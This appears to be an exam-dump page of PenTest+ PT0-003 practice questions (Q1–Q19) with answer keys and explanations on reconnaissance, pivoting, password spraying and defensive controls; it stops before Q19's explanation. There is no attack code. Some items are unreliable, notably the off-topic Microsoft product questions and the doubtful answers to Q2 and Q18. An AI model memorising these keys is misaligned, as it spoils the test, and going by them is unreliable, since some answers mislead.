CompTIA PenTest+ PT0-003 Exam Dumps and Practice Test Questions Set 1 Q1-20
Visit here for our full CompTIA PT0-003 exam dumps and practice test questions.
Question 1:
Which technique is least likely to be used for passive information gathering during the reconnaissance phase of a penetration test?
A) Querying public WHOIS records
B) Conducting a ping sweep against the target network
C) Harvesting employee details from social media profiles
D) Reviewing company press releases and job postings
Answer: B) Conducting a ping sweep against the target network
Explanation:
Querying public WHOIS records is a classic example of passive reconnaissance. When an attacker or penetration tester queries a domain’s WHOIS information, they access publicly available records that list details such as domain registrant, administrative and technical contacts, domain registrar, registration and expiration dates, and DNS servers. This method is entirely passive because it does not send traffic to the target network itself. It merely retrieves information from public databases and helps testers or attackers build a profile of the organization. By understanding who owns the domain and which contacts are linked, the tester can plan further steps such as social engineering or email reconnaissance. Additionally, WHOIS queries may provide hints about the underlying network infrastructure, including potential subdomains or the registrar’s DNS servers, which could become important in later stages of testing. The crucial point here is that it leaves no footprint on the organization’s systems, making it a low-risk, passive method.
Conducting a ping sweep, on the other hand, is an active reconnaissance technique. In a ping sweep, ICMP echo requests are sent to a range of IP addresses to determine which hosts are alive on a network. While this may seem simple, it generates direct traffic to the target network and can be logged or flagged by intrusion detection systems or firewalls. Ping sweeps can alert administrators to the tester’s presence because each active host responds to ICMP requests. Unlike WHOIS queries, which are external and passive, ping sweeps interact directly with the infrastructure, creating a footprint. This exposure makes it unsuitable as a passive method. Although effective for mapping live hosts, it is detectable and technically active, which is why it is considered the least passive technique in this context.
Harvesting employee details from social media profiles is another passive method. Many employees post information about their roles, team structure, projects, and even technologies used within their organizations on platforms like LinkedIn, Twitter, or GitHub. Attackers and penetration testers can gather a wealth of information without touching the organization’s internal systems. This method does not generate network traffic to the target infrastructure, and it is extremely difficult for organizations to detect. It allows testers to build a profile for potential social engineering attacks or targeted phishing campaigns, which is part of the reconnaissance phase.
Reviewing company press releases, job postings, and other publicly available documents is also passive. Press releases may indicate new technology deployments, mergers, or changes in leadership. Job postings can reveal the technologies in use, infrastructure details, and security responsibilities. Like social media harvesting, this approach relies entirely on publicly available information and does not generate alerts on internal systems.
In conclusion, among the four choices, a ping sweep stands out as the least passive technique because it directly interacts with the target network, potentially alerting administrators. WHOIS queries, social media research, and reviewing public documents are all passive techniques because they do not trigger alerts or leave footprints on the target systems. Therefore, B is the correct answer.
Question 2:
During a penetration test, a tester obtains a dumped hash file from a compromised Windows host. Which of the following is the most appropriate immediate next step under a professional test agreement?
A) Attempt to crack the hashes offline using GPU-accelerated tools to recover plaintext passwords
B) Report the hash file to the target organization’s security team and await further instructions
C) Use the hashes to perform a pass-the-hash attack against other systems in the environment
D) Publish the hashes on a public breach notification site to pressure remediation
Answer: B) Report the hash file to the target organization’s security team and await further instructions
Explanation:
Attempting to crack password hashes offline using tools like Hashcat or John the Ripper is a technical possibility, and many penetration testers might consider it to simulate real-world attacks. However, cracking hashes without explicit client approval may violate the rules of engagement and could expose sensitive credentials that the organization is not prepared to handle. GPU-accelerated tools can rapidly process large password sets, which increases the risk that sensitive passwords could be exposed or misused. This is especially problematic if the hashes belong to privileged accounts, as exposure could lead to a significant breach outside the scope of the test. Therefore, while technically feasible, this approach is not the safest or most appropriate immediate action.
Reporting the hash file to the organization’s security team is the professional and responsible step. Under a penetration testing engagement, testers operate under a formal contract that defines what actions are allowed. The discovery of hash files is sensitive because it represents potential compromise of credentials. By reporting it, testers preserve confidentiality, avoid unauthorized exploitation, and allow the organization to determine the next steps. This could include authorizing offline cracking or implementing further monitoring. Immediate reporting aligns with ethical standards and ensures compliance with legal and contractual obligations.
Using the hashes to perform a pass-the-hash attack against other systems may simulate real attacker behavior, but doing so without explicit permission exceeds the engagement scope. Such lateral movement could disrupt operations or compromise systems unexpectedly, potentially creating liability. Although pass-the-hash attacks are realistic from a technical perspective, executing them without authorization is not appropriate at this stage.
Publishing the hashes publicly is outright unethical and illegal. It violates the confidentiality requirements of penetration testing agreements and exposes sensitive organizational data to third parties, potentially resulting in reputational damage, legal action, or regulatory penalties. This is never acceptable under professional standards.
In summary, reporting the discovery to the client and following the agreed-upon escalation process preserves ethical and legal boundaries, ensures responsible handling of sensitive information, and maintains the professional integrity of the engagement. Therefore, B is the correct answer.
Question 3:
Which control is most effective at preventing credential harvesting via phishing emails?
A) Implementing SPF, DKIM, and DMARC for email
B) Enforcing password complexity rules
C) Installing endpoint antivirus on all workstations
D) Conducting background checks on employees
Answer: A) Implementing SPF, DKIM, and DMARC for email
Explanation:
SPF (Sender Policy Framework), DKIM (DomainKeys Identified Mail), and DMARC (Domain-based Message Authentication, Reporting & Conformance) are email authentication protocols that work together to prevent email spoofing, a key component of phishing attacks. SPF allows email servers to verify that incoming mail claiming to be from a specific domain is sent from an authorized IP address. DKIM adds a cryptographic signature to messages, which ensures the content has not been tampered with and confirms the sender’s domain. DMARC builds on both SPF and DKIM by specifying how receiving servers should handle messages that fail authentication checks, allowing organizations to reject or quarantine suspicious emails. This layered approach is highly effective in preventing attackers from sending phishing emails that appear to come from trusted internal sources, directly reducing credential harvesting risk.
Enforcing password complexity rules strengthens password security and reduces the risk of brute-force attacks, but it does not prevent users from voluntarily giving credentials to attackers through phishing. Users may still fall victim to social engineering, and strong passwords alone cannot mitigate phishing campaigns.
Installing endpoint antivirus can detect malicious attachments or malware delivered through phishing emails, but it does not prevent users from submitting their credentials voluntarily in a phishing scenario. While antivirus helps prevent system compromise, it does not stop the human element of credential disclosure.
Conducting background checks may help mitigate insider threats, but it does not address phishing threats coming from external actors. Credential harvesting through phishing exploits human psychology rather than internal malicious intent.
Because SPF, DKIM, and DMARC specifically prevent email spoofing and ensure only legitimate messages reach users, they are the most effective control to prevent credential harvesting via phishing. Therefore, A is the correct answer.
Question 4:
A penetration tester discovers an outdated web application that reveals full stack traces when triggered. Which risk is most directly introduced by this behavior?
A) Information leakage that facilitates further exploitation
B) Increased service latency under heavy load
C) Denial of service from malformed requests
D) Data tampering due to weak integrity controls
Answer: A) Information leakage that facilitates further exploitation
Explanation:
Stack traces are detailed reports generated by a web application when an error occurs. They typically include the path of execution in the code, functions called, parameters used, and sometimes even database query information. In a secure application, error messages should be generic, revealing only that an error occurred. However, when stack traces are displayed to users, they expose internal implementation details that attackers can exploit. This type of vulnerability is classified as information leakage because it provides attackers with knowledge about the application’s structure, coding practices, library versions, and potentially sensitive configuration details.
Increased service latency under heavy load refers to performance degradation rather than a security risk. While displaying stack traces may slightly slow responses due to additional logging or rendering, it is not the primary risk. Attackers do not gain a direct advantage from latency, and it does not provide actionable intelligence for exploitation.
Denial of service (DoS) involves overloading systems to cause service unavailability. While malformed requests could crash an application in some cases, stack traces themselves do not inherently produce DoS conditions. They reveal information rather than directly impact availability.
Data tampering due to weak integrity controls refers to attackers modifying information without detection. Stack traces may reveal data structures or code flow, but they do not allow an attacker to alter stored data directly. The risk is more about knowledge exposure than manipulation.
Information leakage facilitates further exploitation because attackers can use the details revealed to identify specific vulnerabilities, such as unpatched functions, outdated libraries, or unsafe error handling practices. For example, knowing which database is in use can help craft SQL injection attacks, while details about frameworks may reveal default credentials or misconfigurations. Attackers can combine stack trace information with other reconnaissance techniques to plan targeted attacks with higher success probability.
Full stack traces are particularly dangerous because they may reveal sensitive data such as usernames, file paths, or API keys. Even if these values are partial, they provide attackers with enough intelligence to craft subsequent attacks. Therefore, the primary concern is not latency, DoS, or data tampering but rather the disclosure of internal implementation details that could make exploitation significantly easier.
In conclusion, the risk most directly introduced by revealing full stack traces is information leakage that facilitates further exploitation. Attackers gain detailed insight into the application, allowing more efficient targeting of vulnerabilities. While other options describe potential secondary issues, the critical threat is knowledge disclosure. Therefore, A is the correct answer.
Question 5:
Which best describes the primary purpose of a pivot during a penetration test?
A) To escalate privileges on a single host
B) To move laterally and reach additional network segments
C) To exfiltrate sensitive data from the compromised host
D) To maintain persistence on the local machine
Answer: B) To move laterally and reach additional network segments
Explanation:
Pivoting is a core concept in penetration testing and red team operations. When a tester compromises a host within a network, that host can serve as a bridge to access other devices or network segments that were previously unreachable. The goal of pivoting is to extend the attack surface by moving laterally within the organization’s infrastructure. By leveraging the compromised host, attackers can bypass firewalls, segmentation controls, or other network restrictions. Pivoting often involves using techniques such as tunneling, port forwarding, or proxying traffic through the compromised system.
Privilege escalation, while important, is different from pivoting. Privilege escalation refers to increasing access rights on a single host, such as obtaining administrative or root-level permissions. While elevated privileges are often a prerequisite for successful pivoting, privilege escalation alone does not enable lateral movement across multiple network segments.
Exfiltrating sensitive data is a common objective for attackers but does not define pivoting itself. Pivoting is a strategic action to gain broader network access, whereas data exfiltration is a subsequent goal that may occur once lateral movement has been achieved. Exfiltration could happen on a single host or after multiple pivots, but it is not the primary definition of pivoting.
Maintaining persistence refers to ensuring continued access to a compromised system over time. Persistence can involve creating backdoors, scheduled tasks, or startup scripts. While persistence may be maintained on a host used for pivoting, it is a separate goal from lateral movement. Pivoting is about network expansion and access, not simply staying undetected on the initial host.
The essence of pivoting is lateral movement and network expansion. Without pivoting, attackers or testers may be limited to the initial point of compromise. Pivoting enables a more comprehensive evaluation of the organization’s network segmentation, access controls, and monitoring capabilities. By using the compromised host as a pivot, testers can simulate realistic attacker behavior, demonstrating how an intruder could move through the network, reach critical systems, and potentially exfiltrate sensitive information.
In conclusion, pivoting is primarily about moving laterally to access additional network segments. While privilege escalation, data exfiltration, and persistence are important components of an attack chain, the defining feature of pivoting is lateral movement. Therefore, B is the correct answer.
Question 6:
Which assessment activity evaluates whether an organization’s documented security procedures are actually followed by staff?
A) Vulnerability scanning
B) Policy review
C) Social engineering engagement
D) Code review
Answer: C) Social engineering engagement
Explanation:
Vulnerability scanning is a technical assessment technique that focuses on identifying weaknesses in systems, applications, or network infrastructure. Scanners look for unpatched software, misconfigurations, open ports, or other vulnerabilities that could be exploited by attackers. While this activity provides valuable insight into technical security gaps, it does not measure how employees behave in real-world scenarios or whether they adhere to organizational security policies. Vulnerability scanning evaluates the system, not human compliance, and therefore is not sufficient for understanding procedural adherence.
Policy review involves examining written documentation, such as security manuals, standard operating procedures, or regulatory compliance guides. Reviewing policies ensures that an organization has defined acceptable behaviors, processes, and security controls. However, simply reading policies does not reveal whether employees actually follow them in daily operations. There is a potential disconnect between documented procedures and real-world practices, which makes policy review incomplete for evaluating procedural adherence.
Social engineering engagement, on the other hand, is specifically designed to test human behavior in the context of security procedures. This may include simulated phishing attacks, pretexting phone calls, or physical access attempts. By observing employee responses, testers can assess whether staff follow authentication procedures, handle sensitive information appropriately, and adhere to incident reporting guidelines. Social engineering engagements provide a direct, real-world measurement of compliance and the effectiveness of security awareness training. These tests help organizations identify gaps in understanding, negligence, or risky behaviors that could lead to breaches.
Code review is a practice focused on analyzing application source code for security flaws, bugs, or logic errors. While it is critical for finding vulnerabilities in software, code review does not evaluate human adherence to policies. It addresses technical quality rather than employee behavior or procedural compliance.
The primary purpose of assessing compliance with documented procedures is to determine if staff act according to expectations when faced with realistic security scenarios. Social engineering engagements reveal whether employees recognize threats, follow multi-factor authentication requirements, properly handle sensitive data, and report suspicious activity. They bridge the gap between policy and practice, identifying where human error or oversight could lead to organizational risk.
In conclusion, social engineering engagement directly tests human behavior against documented procedures, making it the most effective activity for this purpose. Vulnerability scanning, policy review, and code review provide complementary technical or administrative insights but do not evaluate whether employees consistently follow security procedures. Therefore, C is the correct answer.
Question 7:
Which metric best measures the success of a red team exercise focused on detection and response?
A) Number of vulnerabilities found
B) Time-to-detection of simulated intrusions
C) Percentage of systems scanned
D) Total hours spent by red team members
Answer: B) Time-to-detection of simulated intrusions
Explanation:
The number of vulnerabilities found measures technical weaknesses in systems but does not directly reflect how well an organization can detect and respond to attacks. While identifying vulnerabilities is important for overall security posture, it does not evaluate the effectiveness of the monitoring and incident response teams. This metric provides insight into system exposure but not operational performance in detecting attacks.
Time-to-detection (TTD) measures how long it takes the organization’s security team to identify malicious or suspicious activity during a red team exercise. It directly reflects the effectiveness of monitoring tools, alerting processes, and incident response workflows. A shorter TTD indicates a strong detection capability and demonstrates that the organization can identify intrusions before attackers achieve significant objectives. This metric aligns perfectly with the purpose of red team exercises, which is to simulate real attacks and evaluate defensive capabilities rather than simply discovering technical vulnerabilities.
Percentage of systems scanned reflects the scope of the assessment, but it is an operational metric rather than an indicator of detection or response performance. Scanning coverage ensures that testing encompasses the intended infrastructure, yet it does not measure how quickly attacks are detected or mitigated.
Total hours spent by red team members quantifies effort but does not provide actionable insight into the organization’s defensive capabilities. While it can reflect resource allocation, it does not indicate success in detecting and responding to threats.
The primary goal of a red team exercise is to simulate adversary behavior in a realistic scenario, including lateral movement, exploitation, and data exfiltration. Success is therefore measured by how effectively the organization identifies and responds to these simulated attacks. Time-to-detection captures the speed and efficiency of security monitoring and operational readiness, providing measurable evidence of the organization’s defensive maturity. It enables organizations to benchmark performance, identify gaps, and improve incident response processes.
In conclusion, among the four choices, time-to-detection is the metric that directly evaluates the success of a red team exercise focused on detection and response. Other metrics such as vulnerabilities found, percentage of systems scanned, or hours spent are useful supplementary data but do not measure detection effectiveness. Therefore, B is the correct answer.
Question 8:
Which control most effectively reduces the risk of attackers exploiting default credentials on network devices?
A) Network segmentation
B) Disable unused physical ports
C) Enforce a secure configuration baseline and credential rotation
D) Deploy an IDS to monitor failed login attempts
Answer: C) Enforce a secure configuration baseline and credential rotation
Explanation:
Network segmentation divides the network into isolated segments to limit lateral movement by attackers. While segmentation improves security posture, it does not address the issue of default credentials on network devices. An attacker could still compromise a device within a segment if default credentials exist. Segmentation limits exposure but is not a direct control for credential misuse.
Disabling unused physical ports reduces the attack surface by preventing unauthorized physical connections. However, it does not affect credential security. Default accounts remain exploitable through legitimate network interfaces, meaning attackers could still gain unauthorized access. While this measure complements overall security, it does not solve the primary problem of weak or default passwords.
Enforcing a secure configuration baseline ensures that devices are configured according to security best practices, including the removal or renaming of default accounts. Credential rotation involves changing passwords regularly, particularly for administrative or privileged accounts, which prevents attackers from relying on known default credentials. Combined, these measures directly mitigate the risk of exploitation by ensuring that all accounts are secured and periodically updated. They also support compliance with industry standards and regulatory requirements.
Deploying an IDS (intrusion detection system) to monitor failed login attempts can alert administrators to potential unauthorized access attempts. While monitoring is valuable for detecting attacks, it does not prevent an attacker from successfully exploiting default credentials before detection. IDS is reactive rather than preventive in this context.
The most effective approach for mitigating the risk of default credential exploitation is to implement a secure configuration baseline combined with regular credential rotation. This proactive control ensures that devices are hardened, unnecessary default accounts are removed, and administrative credentials remain secure over time. Other measures like segmentation, port disabling, and IDS monitoring support security but do not directly address the root cause.
In conclusion, enforcing a secure configuration baseline and credential rotation is the primary control for reducing the risk of attackers exploiting default credentials on network devices. Therefore, C is the correct answer.
Question 9:
Which hashing property ensures a small change in input produces a significantly different output?
A) Determinism
B) Collision resistance
C) Avalanche effect
D) Preimage resistance
Answer: C) Avalanche effect
Explanation:
Determinism in hashing ensures that the same input always produces the same output. This is essential for verifying data integrity and comparing hashes, but determinism does not describe the behavior of a hash when the input changes slightly. Deterministic behavior only guarantees consistency, not the sensitivity to input changes.
Collision resistance refers to the difficulty of finding two different inputs that produce the same hash output. While important for preventing certain attacks like hash collisions, collision resistance does not describe the phenomenon in which small changes in input drastically affect the output. It focuses on uniqueness rather than sensitivity.
The avalanche effect is a property of cryptographic hash functions whereby a tiny change in input, even a single bit, causes the output to change drastically. This ensures that similar inputs do not produce similar hash outputs, making it extremely difficult for attackers to predict hash values or infer relationships between inputs. The avalanche effect is critical for security applications such as digital signatures, password hashing, and integrity verification. It ensures that small modifications to data—intentional or accidental—are immediately apparent through a completely different hash.
Preimage resistance ensures that given a hash output, it is computationally infeasible to determine the original input. While preimage resistance protects against reverse engineering of hashes, it does not address the effect of small changes in the input on the output.
The avalanche effect is fundamental for cryptographic security because it ensures that hash outputs are highly sensitive to input variations, thereby enhancing unpredictability and preventing pattern recognition. Determinism ensures consistency, collision resistance protects against duplicate outputs, and preimage resistance prevents input recovery, but only the avalanche effect explains the drastic output changes from minor input modifications.
In conclusion, the property that ensures a small change in input produces a significantly different output is the avalanche effect, making C the correct answer.
Question 10:
Which tool is most suitable for validating web application input handling by submitting crafted requests?
A) Static code analyzer
B) Dynamic application scanner (DAST)
C) Network protocol analyzer
D) Configuration compliance scanner
Answer: B) Dynamic application scanner (DAST)
Explanation:
A static code analyzer examines the source code of an application to detect vulnerabilities, insecure coding patterns, or logic errors. While useful for identifying weaknesses during development, static analysis does not interact with the running application and therefore cannot validate runtime input handling or response behavior.
A dynamic application scanner (DAST) tests the application in its running environment. It submits crafted requests, simulates attacks such as SQL injection or cross-site scripting, and observes how the application responds. DAST is designed to evaluate input validation, error handling, and overall application behavior under attack conditions. It mimics how real attackers interact with the live application and provides actionable insights on vulnerabilities that may be exploitable in production.
A network protocol analyzer captures and inspects network traffic to analyze protocols, performance, or anomalies. While it is useful for diagnosing network issues, it does not generate input specifically to test web application handling, nor does it simulate attack scenarios.
A configuration compliance scanner checks system and application settings against predefined security policies. This ensures adherence to baseline security requirements but does not test input validation or application behavior under malicious inputs.
DAST is the most suitable tool for validating web application input handling because it interacts with the running system, submits crafted requests, and identifies vulnerabilities based on observed behavior. Static analysis, protocol analysis, and compliance scanning provide important insights but cannot test runtime input handling in a realistic manner.
In conclusion, a dynamic application scanner (DAST) is the correct choice for evaluating web application input handling, making B the correct answer.
Question 11:
A penetration tester finds that a company’s VPN allows unlimited failed login attempts before locking out. Which type of attack is most likely to succeed against this configuration?
A) Password spraying
B) Phishing
C) SQL injection
D) Cross-site scripting
Answer: A) Password spraying
Explanation:
Password spraying attacks involve attempting a small number of commonly used passwords against many user accounts, rather than focusing on a single account with repeated guesses. This technique exploits accounts with weak passwords while avoiding detection mechanisms that trigger after multiple failed attempts on a single account. In the context of a VPN that allows unlimited failed login attempts, an attacker can systematically attempt known or commonly used passwords across all accounts without ever causing a lockout. This approach significantly increases the probability of successfully compromising at least one account without alerting security monitoring systems.
Phishing attacks rely on social engineering to trick users into voluntarily providing credentials or clicking malicious links. While phishing is a common and effective attack vector, it is not directly enabled or enhanced by unlimited login attempts on a VPN. The VPN configuration in question affects automated login attempts and does not directly impact phishing success. Phishing requires user interaction rather than exploitation of system configuration, which is why it is not the primary risk here.
SQL injection targets vulnerabilities in database query processing, where malicious input can manipulate backend databases. VPN authentication systems typically do not expose SQL query interfaces in a way that allows attackers to inject commands. While SQL injection is a critical web application threat, it is unrelated to the scenario of unlimited VPN login attempts. It does not exploit authentication policy weaknesses directly.
Cross-site scripting (XSS) attacks exploit web applications by injecting malicious client-side scripts into web pages. This allows attackers to manipulate the behavior of web applications in users’ browsers but does not involve attempting multiple login attempts on VPN systems. XSS is a client-side vulnerability and does not relate to authentication brute-force risks.
Unlimited failed login attempts directly facilitate credential-based attacks like password spraying, because the attacker can attempt a list of common passwords against all accounts without facing lockout thresholds. This creates an environment where a relatively simple automated attack can succeed, particularly if users have weak passwords. In addition, such a configuration increases exposure to brute-force attacks and emphasizes the need for account lockout policies, multi-factor authentication, and monitoring for unusual login patterns.
Therefore, password spraying is the attack most likely to succeed under these circumstances, making A the correct answer.
Question 12:
Which security control would most effectively prevent attackers from exploiting a vulnerable web server via network segmentation?
A) Web application firewall
B) Network segmentation
C) Patch management
D) Endpoint detection and response
Answer: B) Network segmentation
Explanation:
A web application firewall (WAF) inspects HTTP requests and filters malicious input to protect web applications. While a WAF can block specific attacks like SQL injection, cross-site scripting, or parameter tampering, it does not physically isolate systems from other parts of the network. A WAF protects the web application but does not prevent attackers from moving laterally to exploit other internal systems once the perimeter is bypassed.
Network segmentation divides the network into isolated zones, restricting access between critical and less critical segments. By separating sensitive systems from general user networks, segmentation limits the ability of attackers to move laterally after exploiting a single vulnerable server. Even if the web server is compromised, segmentation prevents the attacker from immediately reaching critical internal assets. This control reduces attack surface exposure, enforces the principle of least privilege, and provides better containment of potential breaches. Network segmentation is a proactive measure that directly mitigates the risk associated with exploiting vulnerable hosts.
Patch management ensures that systems and applications are updated to fix known vulnerabilities. While patching reduces the likelihood of successful exploitation, it does not contain the attack if a system is already compromised. Patch management addresses vulnerability reduction but is not a segmentation or containment control.
Endpoint detection and response (EDR) monitors endpoints for suspicious activity and alerts security teams. EDR provides detection and remediation capabilities but is reactive in nature. While it helps identify attacks in progress, it does not prevent lateral movement or restrict network access. EDR enhances visibility but is not sufficient alone to contain an exploited server.
Network segmentation directly limits the attacker’s reach after compromising a system. It enforces isolation and access controls to critical systems, reducing potential impact. By creating defined zones, organizations can prevent attackers from moving from a vulnerable web server to more sensitive infrastructure. Other controls provide important support but do not directly restrict attacker movement.
Therefore, network segmentation is the most effective control for preventing attackers from exploiting a vulnerable web server and moving laterally, making B the correct answer.
Question 13:
A company wants to ensure that only authorized devices can access corporate resources. Which solution is most appropriate?
A) Microsoft Intune
B) Microsoft OneDrive
C) Microsoft Planner
D) Microsoft Defender for Identity
Answer: A) Microsoft Intune
Explanation:
Microsoft Intune is a cloud-based device and application management solution that enforces compliance policies on endpoints. It ensures that only devices meeting security requirements, such as encryption, updated operating systems, or endpoint protection, are allowed to access corporate resources. Intune integrates with conditional access policies in Azure AD to restrict access based on device compliance, making it a highly effective solution for controlling which devices can connect to sensitive systems and data.
Microsoft OneDrive is primarily a cloud storage platform. It allows users to store, share, and synchronize files across devices. While OneDrive includes some access controls, it does not enforce device-level compliance or manage access for all corporate resources. OneDrive is focused on file storage, not device authorization.
Microsoft Planner is a task management and collaboration tool. It helps teams organize work and track progress but has no capabilities to manage device compliance or enforce access controls. Planner is unrelated to device-based access security.
Microsoft Defender for Identity is a monitoring and threat detection solution. It analyzes user behavior and detects potential identity compromise. While valuable for security monitoring and alerting, it does not enforce device authorization or ensure that only compliant endpoints connect to corporate resources.
Intune’s ability to apply device compliance policies, integrate with conditional access, and manage diverse endpoint types provides a comprehensive solution for controlling authorized device access. It allows administrators to prevent unapproved or non-compliant devices from connecting, thereby reducing the risk of data exposure or breaches. Other tools like OneDrive, Planner, and Defender for Identity support collaboration or monitoring but cannot enforce device compliance policies at the access control level.
In conclusion, Microsoft Intune is the solution that directly addresses device authorization for corporate resources, making A the correct answer.
Question 14:
Which type of malware is designed to remain undetected by traditional antivirus and evade monitoring tools?
A) Rootkit
B) Worm
C) Adware
D) Ransomware
Answer: A) Rootkit
Explanation:
Rootkits are malicious software designed to hide their presence on a system. They operate by modifying system kernels, drivers, or critical system libraries, allowing malware to remain invisible to traditional antivirus and monitoring tools. Rootkits can provide attackers with persistent access, allow additional malware to operate undetected, and manipulate system processes to conceal malicious activity. Their stealthy nature makes them particularly dangerous because they can maintain control over a compromised system for extended periods without triggering alerts.
Worms are self-replicating malware that spread across networks. While worms can cause rapid infection and network disruption, they do not inherently focus on remaining undetected. Worms are typically aggressive and noticeable due to their propagation, resource consumption, or alerting by security systems.
Adware displays advertisements to users and may collect browsing behavior or other data. While potentially unwanted, adware is not designed primarily for stealth or evasion. It is often detectable by standard antivirus or endpoint protection solutions.
Ransomware encrypts files and demands a ransom payment for recovery. Its behavior is overt and highly noticeable because encrypted files render systems unusable. While ransomware may include evasion techniques during delivery, its primary function is not stealth, and traditional antivirus or backup solutions are effective defenses when detection is timely.
Rootkits differ from these malware types because their goal is stealth, persistence, and hiding malicious operations from security monitoring. They often serve as a platform for further attacks, such as keylogging, credential theft, or network pivoting, while remaining undetected. Other malware types perform destructive or disruptive actions more visibly.
Therefore, rootkits are the malware type specifically designed to evade detection, making A the correct answer.
Question 15:
A penetration tester wants to identify default accounts on a network device. Which method is most effective?
A) Reviewing vendor documentation and configuration guides
B) Running a port scan
C) Checking event logs for failed logins
D) Deploying endpoint protection software
Answer: A) Reviewing vendor documentation and configuration guides
Explanation:
Vendor documentation and configuration guides provide explicit information on default accounts, default passwords, and initial configurations for network devices. By reviewing these materials, a penetration tester can identify accounts that may still exist in their default state on deployed devices. These accounts often have administrative privileges and are a frequent target for attackers. Understanding default configurations helps testers proactively assess risk, verify whether accounts have been changed, and identify potential vectors for exploitation.
Running a port scan identifies open ports and services on a device but does not reveal account credentials. While port scanning is useful for network mapping and vulnerability discovery, it cannot reliably identify default accounts unless paired with other techniques like service fingerprinting or brute-force testing.
Checking event logs for failed logins can provide insight into attempted access or suspicious activity but will not reveal accounts that have never been accessed or remain in default configuration. Event logs are reactive and require historical activity to provide useful information.
Deploying endpoint protection software focuses on detecting malware or unauthorized changes on endpoints but does not analyze network devices for default account configurations. While endpoint protection improves security posture, it is not designed to uncover default credentials on networking equipment.
Reviewing vendor documentation and configuration guides is the most effective proactive approach. It allows testers to identify high-risk accounts before exploitation attempts, ensuring a thorough assessment of potential security weaknesses.
Question 16:
Which type of attack involves sending malformed packets to a target to trigger a system crash?
A) Denial of Service (DoS)
B) Man-in-the-middle
C) Cross-site scripting
D) Phishing
Answer: A) Denial of Service (DoS)
Explanation:
A Denial of Service (DoS) attack aims to make a system or network resource unavailable to legitimate users. One common technique involves sending malformed or specially crafted packets that exploit software vulnerabilities or buffer handling weaknesses, causing the target system to crash, freeze, or become unresponsive. This type of attack directly impacts availability, one of the core principles of information security. DoS attacks can be simple, targeting a single vulnerability, or complex, leveraging multiple vectors to overwhelm systems. Attackers may also combine DoS with other malicious activity to distract security teams while executing secondary attacks.
Man-in-the-middle (MITM) attacks intercept communication between two parties without their knowledge. The goal is to eavesdrop, modify, or inject data into ongoing communications. MITM attacks focus on confidentiality and integrity rather than availability. While they are serious and can lead to credential theft or data manipulation, they do not inherently cause a system crash or service disruption caused by malformed packets.
Cross-site scripting (XSS) attacks occur in web applications and involve injecting malicious scripts into web pages viewed by other users. The primary risk is executing unauthorized actions in the context of another user, stealing cookies, or hijacking sessions. XSS targets client-side security and does not directly crash server systems or cause widespread denial of service through malformed network packets.
Phishing is a social engineering technique used to trick users into revealing credentials or sensitive information by impersonating trusted entities. While phishing is highly effective for credential theft, it does not exploit malformed packets or directly disrupt system availability. It is entirely reliant on user behavior and does not involve network-level attacks.
DoS attacks are distinguished from these other techniques because they focus on availability disruption rather than data theft or user manipulation. The use of malformed packets to exploit a software flaw is a classic example of a DoS attack that specifically targets system stability. It tests how well a system can handle unexpected or non-compliant inputs and often serves as a wake-up call for organizations to improve resilience, patch management, and monitoring.
In conclusion, sending malformed packets to trigger a system crash is characteristic of a Denial of Service attack. Other choices—MITM, XSS, and phishing—focus on different attack objectives like confidentiality, integrity, or user deception, making A the correct answer.
Question 17:
During a red team engagement, which technique best simulates an insider threat?
A) Social engineering with internal staff
B) Network scanning from an external location
C) SQL injection on public web apps
D) Phishing external customers
Answer: A) Social engineering with internal staff
Explanation:
Social engineering with internal staff simulates insider threat behavior by targeting employees within the organization. Red team testers may impersonate trusted personnel or craft realistic pretexts to gain access to sensitive systems or information. This approach evaluates employee adherence to security policies, awareness of social engineering tactics, and the organization’s internal controls. It effectively measures how internal actors, whether malicious or negligent, could compromise security. Insider threats are often difficult to detect because they exploit legitimate access and trust relationships. Simulated engagements help organizations identify these gaps without exposing sensitive information unnecessarily.
Network scanning from an external location targets perimeter defenses and network visibility but does not emulate insider behavior. While it may identify exposed services or misconfigurations, it does not replicate the risks posed by a trusted employee or someone with legitimate internal access. External scanning focuses on technical vulnerabilities rather than human factors.
SQL injection on public web applications is a classic attack against improperly sanitized input. While it can be highly damaging, it represents an external threat vector and does not reflect the typical capabilities or behavior of insider threats. SQL injection tests for coding weaknesses rather than human risk.
Phishing external customers tests the organization’s influence on individuals outside the company and evaluates the effectiveness of user education for third parties. While important for overall security, it does not simulate insider threat scenarios because it targets external users rather than internal personnel.
Social engineering with internal staff directly addresses the key characteristics of insider threats: leveraging trust, exploiting access rights, and manipulating human behavior. It is the most accurate and practical method for testing internal risk. By monitoring how employees respond to realistic attempts to bypass procedures, red teams can provide actionable recommendations for policy enforcement, awareness training, and detection controls.
In conclusion, social engineering with internal staff is the technique that best simulates insider threats, making A the correct answer. Other approaches address external vulnerabilities and technical weaknesses rather than insider risk.
Question 18:
A company wants to monitor all Microsoft 365 accounts for suspicious login attempts, unusual behavior, and potential account compromises. Which solution is most appropriate?
A) Microsoft Defender for Identity
B) Microsoft Planner
C) Microsoft OneDrive
D) Microsoft Intune
Answer: A) Microsoft Defender for Identity
Explanation:
Microsoft Defender for Identity is a cloud-based security solution that monitors Microsoft 365 accounts and on-premises Active Directory environments. It continuously analyzes user behavior, authentication patterns, and access requests to detect anomalies, such as impossible travel, repeated failed logins, or suspicious privilege escalation attempts. By using machine learning and behavioral analytics, it identifies potential account compromises in real time and provides actionable alerts for security teams to investigate. Defender for Identity integrates with other Microsoft security tools, enabling coordinated response workflows and reducing the likelihood of undetected breaches.
Microsoft Planner is a project and task management tool that helps teams organize work and collaborate. While useful for productivity, it provides no capabilities for monitoring account behavior, detecting suspicious logins, or preventing compromise.
Microsoft OneDrive is a cloud storage platform designed for file storage, sharing, and synchronization. While it manages data access permissions, it does not actively monitor authentication events, behavioral anomalies, or potential identity threats.
Microsoft Intune primarily focuses on endpoint management, ensuring devices meet compliance standards and can enforce conditional access policies. While Intune can control which devices can access resources, it does not perform behavioral analytics on user accounts or detect unusual login activity.
Defender for Identity is purpose-built for identity protection, offering real-time monitoring, anomaly detection, and integration with Microsoft 365 and Azure AD services. It allows security teams to identify compromised accounts early, investigate threats, and respond effectively. Other solutions like Planner, OneDrive, or Intune address productivity, storage, or device management but lack the specialized capabilities required for proactive identity threat monitoring.
In conclusion, Microsoft Defender for Identity provides the most comprehensive and effective solution for monitoring suspicious account activity and detecting potential compromises in Microsoft 365 environments, making A the correct answer.
Question 19:
Which encryption characteristic ensures that encrypted data cannot be reversed without a key?
A) Confidentiality
B) Integrity
C) Non-repudiation
D) Availability
Answer: A) Confidentiality
Explanation:
